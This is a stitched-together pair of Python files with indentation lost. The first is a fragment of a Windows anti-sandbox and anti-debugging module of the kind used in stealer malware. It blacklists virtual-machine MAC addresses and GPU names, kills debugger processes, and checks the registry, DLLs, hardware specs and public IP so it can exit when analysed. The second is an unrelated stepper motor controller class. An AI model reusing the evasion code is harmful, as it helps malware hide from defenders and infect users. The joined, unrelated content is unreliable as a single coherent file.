# incase you want => self.blackListedMacAddresses = ["b4:2e:99:c3:08:3c","00:15:5d:00:07:34","00:e0:4c:b8:7a:58","00:0c:29:2c:c1:21","00:25:90:65:39:e4","c8:9f:1d:b6:58:e4","00:25:90:36:65:0c","00:15:5d:00:00:f3","2e:b8:24:4d:f7:de","00:15:5d:13:6d:0c","00:50:56:a0:dd:00","00:15:5d:13:66:ca","56:e8:92:2e:76:0d","ac:1f:6b:d0:48:fe","00:e0:4c:94:1f:20","00:15:5d:00:05:d5","00:e0:4c:4b:4a:40","42:01:0a:8a:00:22","00:1b:21:13:15:20","00:15:5d:00:06:43","00:15:5d:1e:01:c8","00:50:56:b3:38:68","60:02:92:3d:f1:69","00:e0:4c:7b:7b:86","00:e0:4c:46:cf:01","42:85:07:f4:83:d0","56:b0:6f:ca:0a:e7","12:1b:9e:3c:a6:2c","00:15:5d:00:1c:9a","00:15:5d:00:1a:b9","b6:ed:9d:27:f4:fa","00:15:5d:00:01:81","4e:79:c0:d9:af:c3","00:15:5d:b6:e0:cc","00:15:5d:00:02:26","00:50:56:b3:05:b4","1c:99:57:1c:ad:e4","08:00:27:3a:28:73","00:15:5d:00:00:c3","00:50:56:a0:45:03","12:8a:5c:2a:65:d1","00:25:90:36:f0:3b","00:1b:21:13:21:26","42:01:0a:8a:00:22","00:1b:21:13:32:51","a6:24:aa:ae:e6:12","08:00:27:45:13:10",]
#
self.blackListedGPU = ["Microsoft Remote Display Adapter","Microsoft Hyper-V Video","Microsoft Basic Display Adapter","VMware SVGA 3D","Standard VGA Graphics Adapter","NVIDIA GeForce 840M","NVIDIA GeForce 9400M","UKBEHH_S","ASPEED Graphics Family(WDDM)","H_EDEUEK","VirtualBox Graphics Adapter","K9SC88UK","Стандартный VGA графический адаптер",]
threading.Thread(target=self.blockDebuggers).start()
for t in [self.listCheck, self.inVirtualenv, self.registryCheck, self.specsCheck, self.dllCheck, self.procCheck]:
x = threading.Thread(target=t)
self.processes.append(x)
for thread in self.processes:
thread.start()
for process in self.processes:
process.join()
def programExit(self):
self.running = False
self.__class__.inVM = True
def programKill(self, proc):
try:
os.system(f"taskkill /F /T /IM {proc}")
except Exception:
pass
def blockDebuggers(self) -> bool:
while self.running:
time.sleep(0.7)
for proc in psutil.process_iter():
for program in self.blackListedPrograms:
if proc.name().lower() == program:
self.programKill(program)
def listCheck(self) -> bool:
if os.path.exists(r'D:\Tools'):
self.programExit()
if os.path.exists(r'D:\OS2'):
self.programExit()
if os.path.exists(r'D:\NT3X'):
self.programExit()
myName = os.getlogin()
for user in self.blackListedUsers:
if myName == user:
self.programExit()
myPCName = os.getenv("COMPUTERNAME")
for pcName in self.blackListedPCNames:
if myPCName == pcName:
self.programExit()
myHWID = subprocess.check_output('wmic csproduct get uuid', stdin=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True).decode().split('\n')[1].strip()
for hwid in self.blackListedHWIDS:
if myHWID == hwid:
self.programExit()
try:
myIP = httpx.get("https://api64.ipify.org/").text.strip()
except (TimeoutError, httpx.ConnectError, httpx.ConnectTimeout):
pass
for ip in self.blackListedIPS:
if myIP == ip:
self.programExit()
process = subprocess.Popen("wmic path win32_VideoController get name", stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.DEVNULL, shell=True)
myGPU = process.communicate()[0].decode().strip("Name\n").strip()
for gpu in self.blackListedGPU:
if myGPU == gpu:
self.programExit()
def inVirtualenv(self):
if getattr(sys, "base_prefix", None) or getattr(sys, "real_prefix", None) or sys.prefix != sys.prefix:
self.programExit()
def specsCheck(self) -> bool:
ram = str(psutil.virtual_memory()[0]/1024/1024/1024).split(".")[0]
if int(ram) <= 4:
self.programExit()
disk = str(psutil.disk_usage('/')[0]/1024/1024/1024).split(".")[0]
if int(disk) <= 50:
self.programExit()
if int(psutil.cpu_count()) <= 1:
self.programExit()
def registryCheck(self) -> bool:
reg1 = os.system("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc 2> nul")
reg2 = os.system("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\ProviderName 2> nul")
if reg1 != 1 and reg2 != 1:
self.programExit()
handle = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, 'SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum')
try:
reg_val = winreg.QueryValueEx(handle, '0')[0]
if "VMware" in reg_val or "VBOX" in reg_val:
self.programExit()
finally:
winreg.CloseKey(handle)
def dllCheck(self) -> bool:
vmware_dll = os.path.join(os.environ["SystemRoot"], "System32\\vmGuestLib.dll")
virtualbox_dll = os.path.join(os.environ["SystemRoot"], "vboxmrxnp.dll")
if os.path.exists(vmware_dll):
self.programExit()
if os.path.exists(virtualbox_dll):
self.programExit()
def procCheck(self) -> bool:
processes = ['VMwareService.exe', 'VMwareTray.exe']
for proc in psutil.process_iter():
for program in processes:
if proc.name() == program:
self.programExit()
|
StepperMotor.py
|
##################################
## Author: Jakub Tomaszewski ##
## Stepper Motor Control Class ##
## Company: A4BEE ##
##################################
import subprocess
import yaml
import time
from threading import Thread
import logging
class stepper_motor:
def __init__(self, mapping_value = 1):
self.mapping_value = mapping_value
self.status = self.get_status()
self.current_position = self.get_current_position()
logging.info(f" Current position {int(self.current_position)}")
self.desired_position = int(self.current_position*self.mapping_value)
logging.info(f" Desired position {int(self.desired_position/mapping_value)}")
self.last_desired_position = self.current_position - 1
self.max_speed = self.status['Max speed']
self.starting_speed = self.status['Starting speed']
self.max_deceleration = self.status['Max deceleration']
self.max_acceleration = self.status['Max acceleration']
self.current_limit = self.status['Current limit']
logging.info(f" Mapping value: {self.mapping_value}")
logging.info(f" Max speed: {self.max_speed}")
logging.info(f" Starting speed: {self.starting_speed}")
logging.info(f" Max deceleration: {self.max_deceleration}")
logging.info(f" Max acceleration: {self.max_acceleration}")
logging.info(f" Current limit: {self.current_limit} \n\n")
self.move_th = Thread(target=self.__move, daemon=True)
self.move_th.start()
self.heart_th = Thread(target=self.__heartbeat, daemon=True)
self.heart_th.start()
def __ticcmd(self, *args):
# print("RUN: ", ['ticcmd'] + list(args))
return subprocess.check_output(['ticcmd'] + list(args))
# Return status of the motor
def get_status(self):
self.status = yaml.safe_load(self.__ticcmd('-s', '--full'))
return self.status
# Return the current position of the motor
def get_current_position(self):
status = yaml.safe_load(self.__ticcmd('-s', '--full'))
position = status['Current position']
self.current_position = int(position/self.mapping_value)
return self.current_position
# Set the new desired position
def set_desired_position(self, desired_position):
self.desired_position = int(desired_position*self.mapping_value)
# Function which moves the motor to the desired position
def __move(self):
while True:
if self.last_desired_position != self.desired_position:
self.__ticcmd('--position', str(self.desired_position))
self.last_desired_position = self.desired_position
# Heartbeat of the stepper motor (keeps the ticcmd command timeout from expiring)
def __heartbeat(self):
while True:
# self.get_status()
self.__ticcmd('--reset-command-timeout')
time.sleep(0.1)
# Drive to limit switch
def home_sequence(self, dir):
if dir == "right":
self.__ticcmd('--home', str('rev'))
if dir == "left":
self.__ticcmd('--home', str('fwd'))
# Make the controller forget its current state.
def reset(self):
self.__ticcmd('--reset')
# Disable the motor driver.
def deenergize(self):
self.__ticcmd('--deenergize')
# Stop disabling the driver.
def energize(self):
self.__ticcmd('--energize')
# Set new max speed
def set_max_speed(self, max_speed):
self.max_speed = max_speed
self.__ticcmd('--max-speed', str(self.max_speed))
self.status = self.get_status()
logging.info(f" Max speed after changes: {self.status['Max speed']}")
# Set new starting speed
def set_starting_speed(self, starting_speed):
self.starting_speed = starting_speed
self.__ticcmd('--starting-speed', str(self.starting_speed))
self.status = self.get_status()
logging.info(f" Starting speed after changes: {self.status['Starting speed']}")
# Set new max acceleration
def set_max_acceleration(self, max_acceleration):
self.max_acceleration = max_acceleration
self.__ticcmd('--max-accel', str(self.max_acceleration))
self.status = self.get_status()
logging.info(f" Max acceleration after changes: {self.status['Max acceleration']}")
# Set new max deceleration
def set_max_deceleration(self, max_decelaration):
self.max_deceleration = max_decelaration
self.__ticcmd('--max-decel', str(self.max_deceleration))
self.status = self.get_status()
logging.info(f" Max deceleration after changes: {self.status['Max deceleration']}")
# Set new current limit
def set_current_limit(self, current_limit):
self.current_limit = current_limit
self.__ticcmd('--current', str(current_limit))
self.status = self.get_status()
logging.info(f" Current limit after changes {self.status['Current limit']}")
|